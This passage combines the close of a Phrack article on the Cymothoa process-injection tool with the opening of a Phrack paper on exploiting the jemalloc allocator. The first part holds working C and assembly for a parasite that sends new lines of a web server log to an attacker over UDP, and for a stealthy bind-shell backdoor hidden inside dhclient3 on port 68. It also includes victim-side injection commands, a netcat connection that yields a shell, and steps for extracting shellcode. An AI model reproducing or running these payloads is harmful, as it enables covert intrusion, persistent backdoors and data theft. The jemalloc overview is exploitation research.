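Rewritten as ordinary C, one tick of the parasite looks roughly like this
(file path, destination address and port are placeholders here; in the real
payload they are patched in by the injector, and a fixed buffer replaces
the dynamic stack buffer of the assembly):

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* One scheduled step: if the monitored file grew, send the new bytes
 * to the attacker over UDP. 'last_eof' stands for the persistent
 * memory location provided by the injector.                           */
void tail_step(off_t *last_eof)
{
    char buf[4096];
    struct sockaddr_in dst;
    off_t eof;
    ssize_t n;
    int fd, sock;

    fd = open("/var/log/apache2/access.log", O_RDONLY);
    if (fd < 0)
        return;

    eof = lseek(fd, 0, SEEK_END);                 /* current length    */
    if (*last_eof != 0 && eof > *last_eof) {      /* did the file grow?*/
        lseek(fd, *last_eof, SEEK_SET);           /* back to old end   */
        n = read(fd, buf, sizeof buf);            /* the new lines     */
        if (n > 0) {
            sock = socket(AF_INET, SOCK_DGRAM, 0);
            memset(&dst, 0, sizeof dst);
            dst.sin_family      = AF_INET;
            dst.sin_port        = htons(5555);              /* placeholder */
            dst.sin_addr.s_addr = inet_addr("192.168.0.1"); /* placeholder */
            sendto(sock, buf, n, 0, (struct sockaddr *)&dst, sizeof dst);
            close(sock);
        }
    }
    *last_eof = eof;                              /* remember new end  */
    close(fd);
}

int main(void)                                    /* stand-in for the  */
{                                                 /* setitimer preamble*/
    off_t last = 0;
    for (;;) {
        tail_step(&last);
        usleep(0x5000);
    }
    return 0;
}

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%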
|
|
|
|
The shellcode receives several parameters from the injector: the address
|
|
of a persistent memory location, the attacker IP address and port, and the
|
|
microsecond interval for the timer.
|
|
|
|
The injector simply replaces known hexadecimal mark with these parameters
|
|
during the injection. You can see where the replacements occur looking
|
|
at the comments of the code.
|
|
|
|
Now on to the fun part: the practical use of the parasite.
|
|
|
|
The first thing to do is to prepare the server on the attacker's machine
|
|
to receive data. Inside the main directory of the injector is present a
|
|
simple implementation of a UDP server.
|
|
|
|
You need only to specify an available port:
|
|
|
|
root@attacker# ./udp_server 5555
|
|
./udp_server: listening on port UDP 5555
|
|
|
|
Now we can move to the victim's machine, and choose a suitable process.
|
|
For simplicity we will use cat again.
|
|
|
|
To inject the parasite we must specify some parameters:
|
|
|
|
root@victim# ./cymothoa -p `pidof cat` -s 14 -k 5000 -x attacker_ip -y 5555
|
|
[+] attaching to process 4694
|
|
|
|
register info:
|
|
-----------------------------------------------------------
|
|
eax value: 0xfffffe00 ebx value: 0x0
|
|
esp value: 0xbfa9f3f8 eip value: 0xb77e8430
|
|
------------------------------------------------------------
|
|
|
|
[+] new esp: 0xbfa9f3f4
|
|
[+] injecting code into 0xb77e9000
|
|
[+] copy general purpose registers
|
|
[+] persistent memory at 0xb7805000 (if used)
|
|
[+] detaching from 4694
|
|
|
|
[+] infected!!!
|
|
|
|
The process is now infected. No new process has been created.
|
|
|
|
Now, assuming an apache2 server is running, we can try to make some
|
|
requests to the server to update /var/log/apache2/access.log (the file
|
|
we are monitoring).
|
|
|
|
root@attacker# curl victim_ip
|
|
<html><body><h1>It works!</h1>
|
|
<p>This is the default web page for this server.</p>
|
|
<p>The web server software is running but no content has been added.</p>
|
|
</body></html>
|
|
|
|
If everything worked properly we should see, in the console of the UDP
|
|
server, the new lines generated by our requests:
|
|
|
|
root@attacker# ./udp_server 5555
|
|
./udp_server: listening on port UDP 5555
|
|
::1 - - [26/May/2011:11:18:57 +0200] "GET / HTTP/1.1" 200 460 "-"
|
|
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
|
|
zlib/1.2.3.3 libidn/1.15"
|
|
::1 - - [26/May/2011:11:19:26 +0200] "GET / HTTP/1.1" 200 460 "-"
|
|
"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
|
|
zlib/1.2.3.3 libidn/1.15"
|
|
...
|
|
|
|
Et voila, we have a remote file sniffer!
|
|
|
|
Of course the connections do not appear in the output of tools like
|
|
netstat, as they are only brief exchanges of data, and sockets are open
|
|
only when the monitored file has new lines (and immediately closed).
|
|
|
|
Some notes on the proper use of this preamble and parasite:
|
|
- This preamble is usually not compatible with already existing
|
|
shellcode. The code must be modified to return the execution to the
|
|
host process, restoring stack and registers.
|
|
- It is better to inject the parasite into servers that run all the time
|
|
the machine is on, but do not use the processor very much. The server
|
|
dhclient3 is a perfect host.
|
|
|
|
------------[ 5.3 Single process backdoor
|
|
|
|
We have just arrived at the last and perhaps most interesting example of
|
|
parasite of this document.
|
|
That's what the author wanted to obtain: a backdoor that can live within
|
|
another process, without calls to fork() and without creating new threads.
|
|
|
|
The backdoor listens on a port (customizable by the injector), and
|
|
periodically checks if a client is connected. This part has been
|
|
implemented using nonblocking sockets and a modified alarm() preamble.
|
|
|
|
When a client is connected, it obtains a shell: the only time a call
|
|
to fork() is made.
|
|
|
|
As long as the backdoor is in listening mode, the only way to notice its
|
|
presence is to check the listening ports on the machine, but even in this
|
|
case we can use some tricks to make our parasite very difficult to detect.
|
|
|
|
Here's the code.
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
#
|
|
# Single process backdoor (alarm preamble)
|
|
#
|
|
|
|
handler:
|
|
pusha
|
|
|
|
set_signal_handler:
|
|
# signal(SIGALRM, handler)
|
|
xorl %eax, %eax
|
|
xorl %ebx, %ebx
|
|
mov $48, %al
|
|
mov $14, %bl
|
|
jmp set_signal_handler_end
|
|
load_handler:
|
|
pop %ecx
|
|
subl $0x18, %ecx # adjust %ecx to point handler()
|
|
int $0x80
|
|
jmp shellcode
|
|
|
|
set_signal_handler_end:
|
|
call load_handler
|
|
|
|
shellcode:
|
|
# check if already initialized
|
|
mov $0x4d454d50, %esi # replaced by the injector
|
|
# (persistent memory address)
|
|
mov (%esi), %eax
|
|
cmp $0xdeadbeef, %eax
|
|
je accept_call # jump if already initialized
|
|
|
|
socket_call:
|
|
# call to sys_socketcall($0x01 (socket), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x01, %bl
|
|
jmp socket_args
|
|
load_socket_args:
|
|
pop %ecx
|
|
int $0x80 # %eax = socket descriptor
|
|
|
|
# save socket descriptor
|
|
mov $0xdeadbeef, %ebx
|
|
mov %ebx, (%esi)
|
|
add $4, %esi
|
|
mov %eax, (%esi)
|
|
sub $4, %esi
|
|
jmp fcntl_call
|
|
|
|
socket_args:
|
|
call load_socket_args
|
|
.long 0x02 # AF_INET
|
|
.long 0x01 # SOCK_STREAM
|
|
.long 0x00 # NULL
|
|
|
|
fcntl_call:
|
|
# call to sys_fcntl(socket, F_GETFL)
|
|
mov %eax, %ebx
|
|
xorl %eax, %eax
|
|
mov $55, %al
|
|
xorl %ecx, %ecx
|
|
mov $3, %cl
|
|
int $0x80
|
|
# call to sys_fcntl(socket, F_SETFL, flags | O_NONBLOCK)
|
|
mov %eax, %edx
|
|
xorl %eax, %eax
|
|
mov $55, %al
|
|
mov $4, %cl
|
|
orl $0x800, %edx # O_NONBLOCK (nonblocking socket)
|
|
int $0x80
|
|
|
|
bind_call:
|
|
# prepare sys_socketcall (bind) arguments
|
|
jmp struct_sockaddr
|
|
load_sockaddr:
|
|
pop %ecx
|
|
push $0x10 # sizeof(struct_sockaddr)
|
|
push %ecx # struct_sockaddr address
|
|
push %ebx # socket descriptor
|
|
|
|
# call to sys_socketcall($0x02 (bind), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x02, %bl
|
|
mov %esp, %ecx
|
|
int $0x80
|
|
jmp listen_call
|
|
|
|
struct_sockaddr:
|
|
call load_sockaddr
|
|
.short 0x02 # AF_INET
|
|
.short 0x5250 # PORT (replaced by the injector)
|
|
.long 0x00 # INADDR_ANY
|
|
|
|
listen_call:
|
|
pop %eax # socket descriptor
|
|
pop %ebx
|
|
push $0x10 # queue (backlog)
|
|
push %eax # socket descriptor
|
|
|
|
# call to sys_socketcall($0x04 (listen), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x04, %bl
|
|
mov %esp, %ecx
|
|
int $0x80
|
|
|
|
# restore stack
|
|
pop %edi
|
|
pop %edi
|
|
pop %edi
|
|
|
|
accept_call:
|
|
# prepare sys_socketcall (accept) arguments
|
|
xorl %ecx, %ecx
|
|
push %ecx # socklen_t *addrlen
|
|
push %ecx # struct sockaddr *addr
|
|
add $4, %esi
|
|
push (%esi) # socket descriptor
|
|
|
|
# call to sys_socketcall($0x05 (accept), *args)
|
|
xorl %eax, %eax
|
|
mov $102, %al
|
|
xorl %ebx, %ebx
|
|
mov $0x05, %bl
|
|
mov %esp, %ecx
|
|
int $0x80 # %eax = file descriptor or negative (on error)
|
|
mov %eax, %edx # save file descriptor
|
|
|
|
# restore stack
|
|
pop %edi
|
|
pop %edi
|
|
pop %edi
|
|
|
|
# check return value
|
|
test %eax, %eax
|
|
js schedule_next_and_return # jump on error (negative %eax)
|
|
|
|
|
|
fork_child:
|
|
# call to sys_fork()
|
|
xorl %eax, %eax
|
|
mov $2, %al
|
|
int $0x80
|
|
|
|
test %eax, %eax
|
|
jz dup2_multiple_calls # child continue execution
|
|
# parent schedule_next_and_return
|
|
|
|
schedule_next_and_return:
|
|
|
|
# call to sys_close(socket file descriptor)
|
|
# (since is used only by the child process)
|
|
xorl %eax, %eax
|
|
mov $6, %al
|
|
mov %edx, %ebx
|
|
int $0x80
|
|
|
|
# call to sys_waitpid(-1, NULL, WNOHANG)
|
|
# (to remove zombie processes)
|
|
xorl %eax, %eax
|
|
mov $7, %al
|
|
xorl %ebx, %ebx
|
|
dec %ebx
|
|
xorl %ecx, %ecx
|
|
xorl %edx, %edx
|
|
mov $1, %dl
|
|
int $0x80
|
|
|
|
# alarm(timeout)
|
|
xorl %eax, %eax
|
|
mov $27, %al
|
|
movl $0x53434553, %ebx # replaced by the injector (seconds)
|
|
int $0x80
|
|
|
|
# return
|
|
popa
|
|
ret
|
|
|
|
dup2_multiple_calls:
|
|
# dup2(socket, 2), dup2(socket, 1), dup2(socket, 0)
|
|
xorl %eax, %eax
|
|
xorl %ecx, %ecx
|
|
mov %edx, %ebx
|
|
mov $2, %cl
|
|
dup2_loop:
|
|
mov $63, %al
|
|
int $0x80
|
|
dec %ecx
|
|
jns dup2_loop
|
|
|
|
execve_call:
|
|
# call to sys_execve(program, *args)
|
|
xorl %eax, %eax
|
|
mov $11, %al
|
|
jmp program_path
|
|
load_program_path:
|
|
pop %ebx
|
|
# create argument list [program_path, NULL]
|
|
xorl %ecx, %ecx
|
|
push %ecx
|
|
push %ebx
|
|
mov %esp, %ecx
|
|
mov %esp, %edx
|
|
int $0x80
|
|
|
|
program_path:
|
|
call load_program_path
|
|
.ascii "/bin/sh"
|
|
|
|
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
|
|
|
|
A little summary of the code:
|
|
1) Half preamble, only the signal() part.
|
|
2) Check to see if it's the first execution. This step makes use of a
|
|
persistent memory location, provided by the injector.
|
|
2.1) If already initialized jump to 7
|
|
2.2) If not initialized continue
|
|
3) Open socket.
|
|
4) Set nonblocking using fcntl().
|
|
5) Bind socket to the specified port.
|
|
6) Socket in listen mode with listen().
|
|
7) Check if a client is connected using accept().
|
|
7.1) No clients, jump to 9
|
|
7.2) Client connected, continue
|
|
8) Fork() a child process and execute a shell.
|
|
9) Set the timer and resume host execution
|
|
(the second half of the preamble)
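
The same logic in plain C, for readability (port and timeout are
placeholders for the values patched in by the injector; the static variable
stands for the persistent memory location):

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>

static int srv = -1;                    /* stands for persistent memory */

/* One tick: poll the nonblocking socket with accept(); if a client is
 * there, fork a /bin/sh bound to it (the only fork), reap children,
 * re-arm the alarm and give control back.                              */
void tick(int sig)
{
    int cli = accept(srv, NULL, NULL);

    if (cli >= 0) {
        if (fork() == 0) {
            char *av[] = { "/bin/sh", NULL };
            dup2(cli, 0); dup2(cli, 1); dup2(cli, 2);
            execve("/bin/sh", av, NULL);
            _exit(1);
        }
        close(cli);
    }
    waitpid(-1, NULL, WNOHANG);         /* remove zombie shells         */
    signal(SIGALRM, tick);
    alarm(1);                           /* placeholder timeout          */
}

int main(void)
{
    struct sockaddr_in sa;

    srv = socket(AF_INET, SOCK_STREAM, 0);
    fcntl(srv, F_SETFL, fcntl(srv, F_GETFL) | O_NONBLOCK);

    memset(&sa, 0, sizeof sa);
    sa.sin_family      = AF_INET;
    sa.sin_port        = htons(68);     /* placeholder port             */
    sa.sin_addr.s_addr = INADDR_ANY;
    bind(srv, (struct sockaddr *)&sa, sizeof sa);
    listen(srv, 16);

    signal(SIGALRM, tick);
    alarm(1);

    for (;;)
        pause();                        /* the host's own work          */
    return 0;
}

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%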
|
|
|
|
For this shellcode the provided arguments are a persistent memory
|
|
address, the port to listen on and the timer (in seconds).
|
|
|
|
Finally, let's see a practical example of use.
|
|
|
|
First, we must identify our host process. We also need to find a port that
|
|
is not likely to arouse suspicion.
|
|
|
|
root@victim# lsof -a -i -c dhclient3
|
|
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
|
dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc
|
|
dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc
|
|
|
|
Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a
|
|
good strategy for our backdoor is to listen on port 68/TCP...
|
|
|
|
root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68
|
|
[+] attaching to process 1612
|
|
|
|
register info:
|
|
-----------------------------------------------------------
|
|
eax value: 0xfffffdfe ebx value: 0x6
|
|
esp value: 0xbfff6dd0 eip value: 0xb7682430
|
|
------------------------------------------------------------
|
|
|
|
[+] new esp: 0xbfff6dcc
|
|
[+] injecting code into 0xb7683000
|
|
[+] copy general purpose registers
|
|
[+] persistent memory at 0xb769f000 (if used)
|
|
[+] detaching from 1612
|
|
|
|
[+] infected!!!
|
|
|
|
Let's see the result:
|
|
|
|
root@victim# lsof -a -i -c dhclient3
|
|
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
|
|
dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc
|
|
dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc
|
|
dhclient3 1612 root 7u IPv4 21892 0t0 TCP *:bootpc (LISTEN)
|
|
|
|
As you can see, it is very hard to tell that something is wrong...
|
|
|
|
Now the attacker can connect to the victim and get a shell:
|
|
|
|
root@attacker# nc -vv victim_ip 68
|
|
Connection to victim_ip 68 port [tcp/bootpc] succeeded!
|
|
uname -a
|
|
Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
|
|
|
|
We have achieved our goal: a single process backdoor :)
|
|
|
|
------[ 6. Something about the injector
|
|
|
|
In all these examples we always used the injector cymothoa [3].
|
|
Some notes about this tool...
|
|
|
|
The injector is very important because it allows the customization of the
|
|
shellcode and its injection in the right areas of memory.
|
|
|
|
Cymothoa aims to be an aid to shellcode development, in several ways.
|
|
|
|
The payloads directory contains all the assembly sources created by the
|
|
author, which can easily be compiled with gcc:
|
|
|
|
root@box# cd payloads
|
|
root@box# ls
|
|
clone_shellcode.s fork_shellcode.s
|
|
scheduled_backdoor_alarm.s mmx_example_shellcode.s
|
|
scheduled_setitimer.s scheduled_alarm.s
|
|
scheduled_tail_setitimer.s
|
|
root@box# gcc -c scheduled_backdoor_alarm.s
|
|
root@box#
|
|
|
|
Cymothoa also includes some tools to easily extract the shellcode from
|
|
these object files.
|
|
|
|
For example bgrep [6], a binary grep, which can find the offset
|
|
of particular hexadecimal sequences:
|
|
|
|
root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o
|
|
payloads/scheduled_backdoor_alarm.o: 0000014b
|
|
|
|
This is useful for finding the beginning of the code to extract.
|
|
|
|
Once you locate the beginning and the length of the code, you can easily
|
|
turn it into a C string with the script hexdump_to_cstring.pl.
|
|
|
|
root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \
|
|
./hexdump_to_cstring.pl
|
|
\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb
|
|
\x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde
|
|
\x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd
|
|
...
|
|
|
|
Once this is done you can add this string to the file payloads.h, and
|
|
recompile cymothoa, to have a new, ready to inject, parasite.
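
A new entry then simply pairs the escaped byte string with a short
description, along these lines (a hypothetical sketch: the field names
and the exact layout of payloads.h in cymothoa may differ):

/* hypothetical payloads.h-style entry -- names are illustrative */
struct payload_entry {
    const char *description;
    const char *code;
};

static const struct payload_entry my_parasite = {
    "bind /bin/sh on the injected process (alarm scheduled)",
    "\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80"
    /* ... remaining bytes emitted by hexdump_to_cstring.pl ... */
};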
|
|
|
|
If you want to turn code you already have available into a parasite,
|
|
that's the easy way.
|
|
|
|
The last thing I want to mention about cymothoa is a little utility
|
|
shipped with the main tool: a syscall code generator.
|
|
|
|
Writing syscall based shellcodes can be tedious work, especially if
|
|
you must remember every syscall number and its parameters.
|
|
|
|
Since I am a lazy person, I've written a script able to do part of
|
|
the hard work:
|
|
|
|
root@box# ./syscall_code.pl
|
|
Syscall shellcode generator
|
|
Usage:
|
|
./syscall_code.pl syscall
|
|
|
|
For example you can use it to generate the calling sequence for the
|
|
open syscall:
|
|
|
|
root@box# ./syscall_code.pl sys_open
|
|
sys_open_call:
|
|
# call to sys_open(filename, flags, mode)
|
|
xorl %eax, %eax
|
|
mov $5, %al
|
|
xorl %ebx, %ebx
|
|
mov filename, %bl
|
|
xorl %ecx, %ecx
|
|
mov flags, %cl
|
|
xorl %edx, %edx
|
|
mov mode, %dl
|
|
int $0x80
|
|
|
|
As you can see, the script generates assembly code that marks the syscall's
|
|
arguments and their corresponding registers, as well as the call number.
|
|
|
|
The code is not always 100% reliable (e.g. some syscalls require complex
|
|
structures the script is not able to construct), but it can greatly speed
|
|
up the shellcode development phase.
|
|
|
|
I hope you'll find it useful...
|
|
|
|
------[ 7. Further reading
|
|
|
|
While I was writing this article, the talks for the next edition were
|
|
published on the defcon website.
|
|
|
|
One of these caught my attention [7]:
|
|
|
|
Jugaad - Linux Thread Injection Kit
|
|
|
|
"... The kit currently works on Linux, allocates space inside
|
|
a process and injects and executes arbitrary payload as a
|
|
thread into that process. It utilizes the ptrace() functionality
|
|
to manipulate other processes on the system. ptrace() is an API
|
|
generally used by debuggers to manipulate(debug) a program.
|
|
By using the same functionality to inject and manipulate the
|
|
flow of execution of a program Jugaad is able to inject the
|
|
payload as a thread."
|
|
|
|
I recommend that all readers who found this article interesting follow
|
|
this talk, because it is similar research, parallel to mine.
|
|
|
|
My goal was to implement a stealth backdoor without creating new processes
|
|
or threads, while Aseem's research focuses on the creation of threads
|
|
to achieve the same level of stealthiness.
|
|
|
|
I therefore offer my best wishes to Aseem, since I think our works are
|
|
complementary.
|
|
|
|
For additional material on code injection, see the links
|
|
listed at the end of the document.
|
|
|
|
Bye bye ppl ;)
|
|
|
|
Greetings (in random order): emgent, scox, white_sheep (and all ihteam),
|
|
sugar, renaud, bt_smarto, cris.
|
|
|
|
------[ 8. Links and references
|
|
|
|
[0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace
|
|
[1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt
|
|
[2] http://www.phrack.org/issues.html?issue=58&id=4#article
|
|
(5 - The dynamic linker's dl-resolve() function)
|
|
[3] http://vxheavens.com/lib/vrn00.html#c42
|
|
[4] http://cymothoa.sourceforge.net/
|
|
[5] http://www.exploit-db.com/exploits/13388/
|
|
[6] http://debugmo.de/2009/04/bgrep-a-binary-grep/
|
|
[7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar
|
|
|
|
------[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x0a of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=---------------=[ The false kingdom of jemalloc, or ]=------------------|
|
|
|=-----------=[ On exploiting the jemalloc memory manager ]=-------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ argp | huku ]=------------------------=|
|
|
|=--------------------=[ {argp,huku}@grhack.net ]=---------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
--[ Table of contents
|
|
|
|
1 - Introduction
|
|
1.1 - Thousand-faced jemalloc
|
|
2 - jemalloc memory allocator overview
|
|
2.1 - Basic structures
|
|
2.1.1 - Chunks (arena_chunk_t)
|
|
2.1.2 - Arenas (arena_t)
|
|
2.1.3 - Runs (arena_run_t)
|
|
2.1.4 - Regions/Allocations
|
|
2.1.5 - Bins (arena_bin_t)
|
|
2.1.6 - Huge allocations
|
|
2.1.7 - Thread caches (tcache_t)
|
|
2.1.8 - Unmask jemalloc
|
|
2.2 - Algorithms
|
|
3 - Exploitation tactics
|
|
3.1 - Adjacent region corruption
|
|
3.2 - Heap manipulation
|
|
3.3 - Metadata corruption
|
|
3.3.1 - Run (arena_run_t)
|
|
3.3.2 - Chunk (arena_chunk_t)
|
|
3.3.3 - Thread caches (tcache_t)
|
|
4 - A real vulnerability
|
|
5 - Future work
|
|
6 - Conclusion
|
|
7 - References
|
|
8 - Code
|
|
|
|
--[ 1 - Introduction
|
|
|
|
In this paper we investigate the security of the jemalloc allocator
|
|
in both theory and practice. We are particularly interested in the
|
|
exploitation of memory corruption bugs, so our security analysis will
|
|
be biased towards that end.
|
|
|
|
jemalloc is a userland memory allocator. It provides an implementation
|
|
for the standard malloc(3) interface for dynamic memory management. It
|
|
was written by Jason Evans (hence the 'je') for FreeBSD since there
|
|
was a need for a high performance, SMP-enabled memory allocator for
|
|
libc. After that, jemalloc was also used by the Mozilla Firefox browser
|
|
as its internal dedicated custom memory allocator.
|
|
|
|
All the above have led to a few versions of jemalloc that are very
|
|
similar but not exactly the same. To summarize, there are three different
|
|
widely used versions of jemalloc: 1) the standalone version [JESA],
|
|
2) the version in the Mozilla Firefox web browser [JEMF], and 3) the
|
|
FreeBSD libc [JEFB] version.
|
|
|
|
The exploitation vectors we investigate in this paper have been tested
|
|
on the jemalloc versions presented in subsection 1.1, all on the x86
|
|
platform. We assume basic knowledge of x86 and a general familiarity
|
|
with userland malloc() implementations, however these are not strictly
|
|
required.
|
|
|
|
|
|
----[ 1.1 - Thousand-faced jemalloc
|
|
|
|
There are so many different jemalloc versions that we almost went crazy
|
|
double checking everything in all possible platforms. Specifically, we
|
|
tested the latest standalone jemalloc version (2.2.3 at the time of this
|
|
writing), the version included in the latest FreeBSD libc (8.2-RELEASE),
|
|
and the Mozilla Firefox web browser version 11.0. Furthermore, we also
|
|
tested the Linux port of the FreeBSD malloc(3) implementation
|
|
(jemalloc_linux_20080828a in the accompanying code archive) [JELX].
|
|
|
|
|
|
--[ 2 - jemalloc memory allocator overview
|
|
|
|
The goal of this section is to provide a technical overview of the
|
|
jemalloc memory allocator. However, it is not all-inclusive. We will only
|
|
focus on the details that are useful for understanding the exploitation
|
|
attacks against jemalloc analyzed in the next section. The interested
|
|
reader can look in [JE06] for a more academic treatment of jemalloc
|
|
(including benchmarks, comparisons with other allocators, etc).
|
|
|
|
Before we start our analysis we would like to point out that jemalloc (as
|
|
well as other malloc implementations) does not implement concepts like
|
|
'unlinking' or 'frontlinking' which have proven to be catalytic for the
|
|
exploitation of dlmalloc and Microsoft Windows allocators. That said, we
|
|
would like to stress the fact that the attacks we are going to present do
|
|
not directly achieve a write-4-anywhere primitive. We, instead, focus on
|
|
how to force malloc() (and possibly realloc()) to return a chunk that will
|
|
most likely point to an already initialized memory region, in hope that
|
|
the region in question may hold objects important for the functionality
|
|
of the target application (C++ VPTRs, function pointers, buffer sizes and
|
|
so on). Considering the various anti-exploitation countermeasures present
|
|
in modern operating systems (ASLR, DEP and so on), we believe that such
|
|
an outcome is far more useful for an attacker than a 4 byte overwrite.
|
|
|
|
jemalloc, as a modern memory allocator should, recognizes that minimal
|
|
page utilization is no longer the most critical feature. Instead it
|
|
focuses on enhanced performance in retrieving data from the RAM. Based
|
|
on the principle of locality which states that items that are allocated
|
|
together are also used together, jemalloc tries to situate allocations
|
|
contiguously in memory. Another fundamental design choice of jemalloc is
|
|
its support for SMP systems and multi-threaded applications by trying
|
|
to avoid lock contention problems between many simultaneously running
|
|
threads. This is achieved by using many 'arenas' and the first time a
|
|
thread calls into the memory allocator (for example by calling malloc(3))
|
|
it is associated with a specific arena. The assignment of threads to
|
|
arenas happens with three possible algorithms: 1) with a simple hashing
|
|
on the thread's ID if TLS is available 2) with a simple builtin linear
|
|
congruential pseudo random number generator in case MALLOC_BALANCE is
|
|
defined and TLS is not available 3) or with the traditional round-robin
|
|
algorithm. For the latter two cases, the association between a thread
|
|
and an arena doesn't stay the same for the whole life of the thread.
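
A simplified sketch of the first policy (the real choose_arena() code is
more involved, but the idea is simply to spread threads over the global
arena array introduced in 2.1.2):

#include <pthread.h>

/* sketch only: hash the calling thread's id over the available arenas;
 * 'arenas' and 'narenas' are the globals shown in subsection 2.1.2 */
static arena_t *choose_arena_sketch(void)
{
    unsigned long tid = (unsigned long)pthread_self();

    return arenas[tid % narenas];
}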
|
|
|
|
Continuing our high-level overview of the main jemalloc structures
|
|
before we dive into the details in subsection 2.1, we have the concept of
|
|
'chunks'. jemalloc divides memory into chunks, always of the same size,
|
|
and uses these chunks to store all of its other data structures (and
|
|
user-requested memory as well). Chunks are further divided into 'runs'
|
|
that are responsible for requests/allocations up to certain sizes. A run
|
|
keeps track of free and used 'regions' of these sizes. Regions are the
|
|
heap items returned on user allocations (e.g. malloc(3) calls). Finally,
|
|
each run is associated with a 'bin'. Bins are responsible for storing
|
|
structures (trees) of free regions.
|
|
|
|
The following diagram illustrates in an abstract manner the relationships
|
|
between the basic building blocks of jemalloc.
|
|
|
|
Chunk #0 Chunk #1
|
|
.--------------------------------. .--------------------------------.
|
|
| | | |
|
|
| Run #0 Run #1 | | Run #0 Run #1 |
|
|
| .-------------..-------------. | | .-------------..-------------. |
|
|
| | || | | | | || | |
|
|
| | Page || Page | | | | Page || Page | |
|
|
| | .---------. || .---------. | | | | .---------. || .---------. | |
|
|
| | | | || | | | | | | | | || | | | | ...
|
|
| | | Regions | || | Regions | | | | | | Regions | || | Regions | | |
|
|
| | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | |
|
|
| | | ^ ^ | || | | | | | | | ^ ^ | || | | | |
|
|
| | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | |
|
|
| `---|-----|---'`-------------' | | `---|-----|---'`-------------' |
|
|
`-----|-----|--------------------' `-----|-----|--------------------'
|
|
| | | |
|
|
| | | |
|
|
.---|-----|----------. .---|-----|----------.
|
|
| | | | | | | |
|
|
| free regions' tree | ... | free regions' tree | ...
|
|
| | | |
|
|
`--------------------' `--------------------'
|
|
bin[Chunk #0][Run #0] bin[Chunk #1][Run #0]
|
|
|
|
|
|
----[ 2.1 - Basic structures
|
|
|
|
In the following paragraphs we analyze in detail the basic jemalloc
|
|
structures. Familiarity with these structures is essential in order to
|
|
begin our understanding of the jemalloc internals and proceed to the
|
|
exploitation step.
|
|
|
|
|
|
------[ 2.1.1 - Chunks (arena_chunk_t)
|
|
|
|
If you are familiar with Linux heap exploitation (and more precisely with
|
|
dlmalloc internals) you have probably heard of the term 'chunk' before. In
|
|
dlmalloc, the term 'chunk' is used to denote the memory regions returned
|
|
by malloc(3) to the end user. We hope you get over it soon because when it
|
|
comes to jemalloc the term 'chunk' is used to describe big virtual memory
|
|
regions that the memory allocator conceptually divides available memory
|
|
into. The size of the chunk regions may vary depending on the jemalloc
|
|
variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region
|
|
(aligned to its size), while on the latest FreeBSD (in CVS at the time of
|
|
this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the
|
|
highest abstraction used in jemalloc's design, that is the rest of the
|
|
structures described in the following paragraphs are actually placed within
|
|
a chunk somewhere in the target's memory.
|
|
|
|
The following are the chunk sizes in the jemalloc variants we have
|
|
examined:
|
|
|
|
+---------------------------------------+
|
|
| jemalloc variant | Chunk size |
|
|
+---------------------------------------+
|
|
